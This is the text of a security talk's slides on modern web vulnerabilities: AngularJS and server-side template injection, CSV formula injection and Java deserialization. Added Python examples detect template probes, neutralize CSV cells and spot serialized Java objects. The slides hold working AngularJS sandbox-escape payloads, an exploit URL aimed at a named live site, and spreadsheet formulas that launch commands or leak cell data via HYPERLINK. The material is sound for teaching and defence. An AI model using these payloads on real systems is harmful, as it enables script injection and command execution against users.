Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Some new vulnerabilities in modern web application
(Part 1)
hkln1 (@anh_npt)
Thank you to our sponsors
AngularJS Template Injection (Client-side template injection)
What is AngularJS?
• Popular MVC JavaScript framework
• Maintained and recommended by Google
• Read more: https://docs.angularjs.org/tutorial
What's the risk? (1)
Not vulnerable
What's the risk? (2)
???
Four general attack vectors
1. Attacking the Sandbox
2. Attacking the Sanitizer
3. Attacking the CSP Mode
4. Attacking the Codebase
The payloads…
• 1.0.1 - 1.1.5
  {{constructor.constructor('alert(1)')()}}
• 1.2.0 - 1.2.1
  {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
• …
• 1.4.0 - 1.4.9
  {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
• 1.5.0-rc2: Fixed
AngularJS injection in the wild (1)
• https://hackerone.com/reports/125027
AngularJS injection in the wild (2)
• Check: https://developer.uber.com/docs/deeplinking?q=wrtz{{7*7}}
• Response: wrtz49 → Vulnerable
• Exploit: https://developer.uber.com/docs/deep-linking?q=wrtz{{(_="".sub).call.call({}[$="constructor"].getOwnPropertyDescriptor(_.__proto__,$).value,0,"alert(1)")()}}zzzz
Demo
• Piwik
Reference
• http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
• http://www.slideshare.net/x00mario/an-abusive-relationship-with-angularjs
Server-side template injection
What is a template engine? (1)
• Presents dynamic data via web pages and emails.
• Separation of presentation (HTML/CSS) from application logic.
• Used in wikis, blogs, marketing applications and CMS.
• Some template engines:
  • FreeMarker
  • Velocity
  • Smarty
  • Twig
  • Jade
What is a template engine? (2)
• Plain PHP: <?php echo $param ?>
• Plain PHP, escaped: <?php echo htmlspecialchars($var, ENT_QUOTES, 'UTF-8') ?>
• Template syntax (e.g. Twig): {{ param }}
• Template syntax, escaped: {{ param | escape }} / {{ param | e }}
What's the risk?
• Not only XSS: Remote Code Execution (RCE)
• Arbitrary object creation
• Arbitrary file read/write
• Remote file include
• Information disclosure and privilege escalation
Introduction (1)
• $output = $twig->render("Dear {first_name},", array("first_name" => $user->first_name)); → Not vulnerable
• $output = $twig->render($_GET['custom_email'], array("first_name" => $user->first_name)); → ???
Introduction (2)
• custom_email={{7*7}} → 49
• custom_email={{self}} → Object of class __TwigTemplate_7ae62e582f8a35e5ea6cc639800ecf15b96c0d6f78db3538221c1145580ca4a5 could not be converted to string
Template injection methodology
Detect (1)
• Plaintext context (engine: template → rendered output)
  smarty:      Hello {user.name}   → Hello user1
  freemarker:  Hello ${username}   → Hello user1
  any:         <b> Hello </b>      → <b> Hello </b>
  smarty:      Hello ${7*7}        → Hello 49
  freemarker:  Hello ${7*7}        → Hello 49
Detect (2)
• Code context (template → rendered output)
  Personal_greeting = username            → Hello user1
  Personal_greeting = username<tag>       → Hello
  Personal_greeting = username }} <tag>   → Hello user01 <tag>
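As an added example (not part of the slides), a small Python log scanner that turns the detection steps above around for the defender: it decodes query parameters from access-log lines and flags the {{7*7}}, ${7*7} and {7*7} style probes, so the checks a tester sends (the wrtz{{7*7}} request against the AngularJS page earlier, the custom_email={{self}} probe) show up in monitoring. The log lines are constructed, and the engine labels are this example's own naming.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Delimiters of the engines in this talk: AngularJS/Twig/Jinja2 "{{ }}",
# FreeMarker "${ }" and Smarty "{ }"; ERB/JSP-style "<%= %>" is added as well.
PROBE_PATTERNS = [
    ("mustache", re.compile(r"\{\{.+?\}\}", re.S)),
    ("dollar_brace", re.compile(r"\$\{.+?\}", re.S)),
    ("erb", re.compile(r"<%=.+?%>", re.S)),
    # Single braces only count when the body holds an arithmetic operator
    # ({7*7}); plain JSON-looking values stay out of the results.
    ("smarty", re.compile(r"(?<![{$])\{(?!\{)[^{}]*[*+/-][^{}]*\}")),
]
# Client address and request target from an Apache/nginx combined-format line.
REQUEST_LINE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/')

def find_probes(target):
    """Return (param, engine_label, matched_text) for each query parameter
    that contains template syntax after percent/plus decoding."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for label, pattern in PROBE_PATTERNS:
            match = pattern.search(value)
            if match:
                findings.append((name, label, match.group(0)))
    return findings

def scan_log(text):
    """Scan access-log text and return one dict per suspicious parameter."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_LINE.match(line)
        if not m:
            continue
        for param, label, matched in find_probes(m.group("target")):
            hits.append({"line": lineno, "ip": m.group("ip"), "param": param,
                         "label": label, "match": matched})
    return hits

# Constructed sample log (not real traffic): line 1 mirrors the wrtz{{7*7}} check,
# line 2 the {{self}} probe, lines 3-4 the ${7*7} and {7*7} detection steps.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2016:10:00:01 +0000] "GET /docs/deeplinking?q=wrtz%7B%7B7*7%7D%7D HTTP/1.1" 200 1234
203.0.113.5 - - [10/Mar/2016:10:00:02 +0000] "GET /profile?custom_email=%7B%7Bself%7D%7D HTTP/1.1" 500 88
198.51.100.7 - - [10/Mar/2016:10:00:03 +0000] "GET /search?name=Hello%20%24%7B7*7%7D HTTP/1.1" 200 512
198.51.100.7 - - [10/Mar/2016:10:00:04 +0000] "GET /search?name=%7B7*7%7D HTTP/1.1" 200 512
192.0.2.9 - - [10/Mar/2016:10:00:05 +0000] "GET /search?name=alice&page=2 HTTP/1.1" 200 4096
"""
if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A 500 response following a `{{self}}`-style probe, as in the second line, is the kind of pairing worth alerting on, since the Twig error shown in the slides is exactly what the tester is looking for.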
Identify
Exploit (read the template engine's documentation)
• 'For Template Authors' - sections covering basic syntax.
• 'Security Considerations' - chances are whoever developed the app you're testing didn't read this, and it may contain some useful hints.
• Lists of builtin methods, functions, filters, and variables.
• Lists of extensions/plugins - some may be enabled by default.
Payloads: Smarty (1)
Payloads: Smarty (2)
Payloads: Smarty (3)
Payloads: Smarty (4)
Payloads: Twig
Payloads: Twig (Sandboxed)
Payloads: Jade
Payloads: FreeMarker
Server-side template injection in the wild
• https://hackerone.com/reports/125980
Demo
• Flask/Jinja2
• Alfresco
Reference
• http://blog.portswigger.net/2015/08/server-side-template-injection.html
• https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2/
• https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii
Formula Injection (CSV Injection)
What is CSV Injection?
• Exploited via export functionality that allows users to download CSV (Excel) files.
• Exports often contain input from untrusted sources such as survey responses, transaction details, and user-supplied addresses, …
• The attacker can execute arbitrary commands on the user's machine if the web application does not properly validate the contents of the CSV file.
How to test?
• =1 + 1 → 2
• -2 + 3 → 1
• +3 + 5 → 8
The payloads…
• =HYPERLINK(https://example.com?test=&A1&A2,"Error: please click for further information")
• =DDE("cmd";"/C calc"; "DdeLink_60_870516294")
• =cmd | ' /C calc ' !A0
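An added example, not from the slides: the export-side fix for the test cases above, in Python, following the OWASP guidance referenced in this section. Untrusted cells that begin with =, +, -, @, tab or carriage return get a leading apostrophe and every field is quoted; the sample rows are constructed and reuse the probe values from the slide as user-supplied text.

```python
import csv
import io

# Leading characters that make Excel/LibreOffice evaluate a cell (OWASP CSV
# injection guidance); "-" and "+" are included because "-2 + 3" and "+3 + 5"
# are evaluated exactly like "=1 + 1".
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

def neutralize_cell(value):
    """Return a cell value that a spreadsheet will treat as text.
    Typed numbers from the application pass through untouched (a negative
    balance is data, not a formula); untrusted strings that start with a
    trigger character get a leading apostrophe."""
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return str(value)
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text

def export_rows(rows, fieldnames):
    """Serialize rows with every cell neutralized and quoted, so a field cannot
    break out of its quotes (an embedded '"' is doubled by the csv module)."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({name: neutralize_cell(row.get(name)) for name in fieldnames})
    return buf.getvalue()

# Constructed sample export; rows 2 and 3 carry the probes and the HYPERLINK
# payload shape from the slides as user-supplied text.
SAMPLE_ROWS = [
    {"name": "alice", "address": "1 Main St", "balance": -2},
    {"name": "=1 + 1", "address": "-2 + 3", "balance": 5},
    {"name": "eve", "address": '=HYPERLINK("https://example.com?x="&A1,"click")', "balance": 0},
]

if __name__ == "__main__":
    print(export_rows(SAMPLE_ROWS, ["name", "address", "balance"]))
```

The apostrophe stays visible when the CSV is opened in Excel (it only acts as an invisible text marker for cells typed in the UI), which is the trade-off the OWASP page describes.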
CSV Injection in the wild
Demo
• Magento Community
Reference
• https://www.owasp.org/index.php/CSV_Excel_Macro_Injection
• https://hackerone.com/reports/72785
• http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
Java deserialization vulnerability
What is serialization? (1)
What is serialization? (2)
More complex serialization… (1)
More complex serialization… (2)
Serialization in the context of Java web applications and application servers
• In HTTP requests – Parameters, ViewState, Cookies
• RMI – the extensively used Java RMI protocol
• RMI over HTTP – many Java thick-client web apps use this
• JMX
• Custom protocols
What's the problem?
• What if we knew of an object that implemented a "readObject" method that did something dangerous?
• What if, instead of appending an exclamation point to a user-defined string?
How to identify whether an application might be vulnerable?
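An added example (not the talk's own code) for the identification step, in Python: it looks for the Java serialization stream header (AC ED 00 05 raw, rO0AB in base64, aced0005 in hex) in the places listed above, query parameters, a ViewState-like field and cookies, and reads the class name from the first class descriptor so a log entry can record what type the application is being asked to deserialize. The request fields are constructed and java.util.Date is only a stand-in class name.

```python
import base64
import re
from urllib.parse import unquote_to_bytes

JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"  # STREAM_MAGIC 0xACED + STREAM_VERSION 5
TC_OBJECT, TC_CLASSDESC = 0x73, 0x72
# How the 4-byte header shows up in parameters, ViewState and cookies.
ENCODED_MAGIC = [
    ("raw", re.compile(rb"\xac\xed\x00\x05")),
    ("base64", re.compile(rb"rO0AB")),
    ("hex", re.compile(rb"(?i)aced0005")),
]

def decode_to_bytes(value, encoding):
    """Undo the transport encoding; b"" when the value does not decode."""
    try:
        if encoding == "base64":
            value = value.strip().replace(b"-", b"+").replace(b"_", b"/")
            return base64.b64decode(value + b"=" * (-len(value) % 4))
        return bytes.fromhex(value.decode("ascii")) if encoding == "hex" else value
    except ValueError:
        return b""

def first_class_name(blob):
    """Class named by the first TC_CLASSDESC when the stream opens with TC_OBJECT, else None."""
    if len(blob) < 8 or blob[:6] != JAVA_STREAM_MAGIC + bytes([TC_OBJECT, TC_CLASSDESC]):
        return None
    length = int.from_bytes(blob[6:8], "big")
    name = blob[8:8 + length]
    return name.decode("utf-8", "replace") if len(name) == length else None

def request_fields(query, cookie_header):
    """Yield (location, name, raw_value) for every query parameter and cookie."""
    for location, raw, sep in (("query", query, b"&"), ("cookie", cookie_header, b";")):
        for part in raw.split(sep):
            name, _, value = part.strip().partition(b"=")
            if name:
                yield location, name.decode("latin-1"), unquote_to_bytes(value)

def find_java_objects(fields):
    """One finding per field whose value carries a Java serialization header."""
    findings = []
    for location, name, value in fields:
        encoding = next((e for e, p in ENCODED_MAGIC if p.search(value)), None)
        if encoding:
            findings.append({"where": location, "name": name, "encoding": encoding,
                             "class": first_class_name(decode_to_bytes(value, encoding))})
    return findings

# Constructed sample request: base64 object in a ViewState-like parameter, hex one in a cookie.
SAMPLE_OBJECT = JAVA_STREAM_MAGIC + bytes([TC_OBJECT, TC_CLASSDESC]) + b"\x00\x0ejava.util.Date"
SAMPLE_QUERY = b"page=2&viewState=" + base64.b64encode(SAMPLE_OBJECT)
SAMPLE_COOKIE = b"JSESSIONID=abc123; remember=" + SAMPLE_OBJECT.hex().encode()
```

Only the common head layout (TC_OBJECT followed by TC_CLASSDESC) is parsed; streams that open with a proxy or array descriptor still get flagged by the header match, just without a class name.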
Java deserialization vulnerability in the wild
• http://artsploit.blogspot.com/2016/01/paypal-rce.html
Analysis of exploiting the real cases – JBoss application (1)
1. Identify
Analysis of exploiting the real cases – JBoss application (2)
2. Exploit
Demo
Analysis of exploiting the real cases – Jenkins application (1)
1. Vulnerability Detection
Analysis of exploiting the real cases – Jenkins application (2)
1. Vulnerability Detection
Analysis of exploiting the real cases – Jenkins application (3)
1. Vulnerability Detection
Analysis of exploiting the real cases – Jenkins application (3)
2. Exploit Development
Analysis of exploiting the real cases – Jenkins application (3)
2. Exploit Development
Analysis of exploiting the real cases – Jenkins application (3)
2. Exploit Development
Analysis of exploiting the real cases – Jenkins application (4)
2. Exploit Development
Analysis of exploiting the real cases – Jenkins application (5)
2. Exploit Development
Demo
Reference
• https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
• http://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles
• https://www.youtube.com/watch?v=VviY3O-euVQ